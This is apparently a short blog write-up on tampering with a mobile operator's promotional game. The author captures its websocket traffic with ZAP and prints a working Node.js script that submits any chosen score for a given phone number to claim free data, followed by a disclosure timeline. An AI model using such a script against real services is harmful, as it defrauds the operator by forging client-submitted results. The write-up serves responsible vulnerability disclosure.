So my mobile operator had a campaign where you could get free mobile data just by playing a game similar to flappy birds. No catch, just play the game.

This is how the game looked:

When you lost it would display the amount of data you would get. Note, if you first scored 1GB of data, and the next game 2GB of data, you would only get 2GB. The best highscore was the only score that mattered.

Playing is boring, reverse engineering is more fun. Fire up zap and play the game a couple of times.

I noticed there was a websocket request to:

API endpoint: /existingcustomer/[phone-number]

Request data:
{
    "phone": "phone-number",
    "score": 100.5 # Score = how much GB you want
}

Wrote a quick node.js program to let me get any highscore I wanted.

var prompt = require('prompt');
var WebSocket = require('ws')

var ws = new WebSocket("wss://xxx/.ws?v=5&ns=vimlagame");

prompt.start();
prompt.get(['phonenumber', 'score'], function (err, result) {
    
    ws.onmessage = function (event) {
        console.log("[Recieved] " + event.data);
    }

    var payload = {  
           "t":"d",
           "d":{  
              "r":2,//Retry count
              "a": "p",
              "b":{  
                 "p": "/existingcustomer/" + result.phonenumber,
                 "d": {
                     "phone": result.phonenumber,
                     "score": parseFloat(result.score)
                 } 
              }
           }
    };
    var data = JSON.stringify(payload);
    console.log("[Sent] " + data);
    ws.send(data);

    //Wait for response, then exit
    setTimeout(function(){
        ws.close();
    }, 1500);
});

Disclosure Timeline

• 15 February - Reported to vimla
• 18 February - Vimla responded and told me they where aware of people cheating.

Note: I did not abuse the script! I only wrote a small PoC to the vimla team :)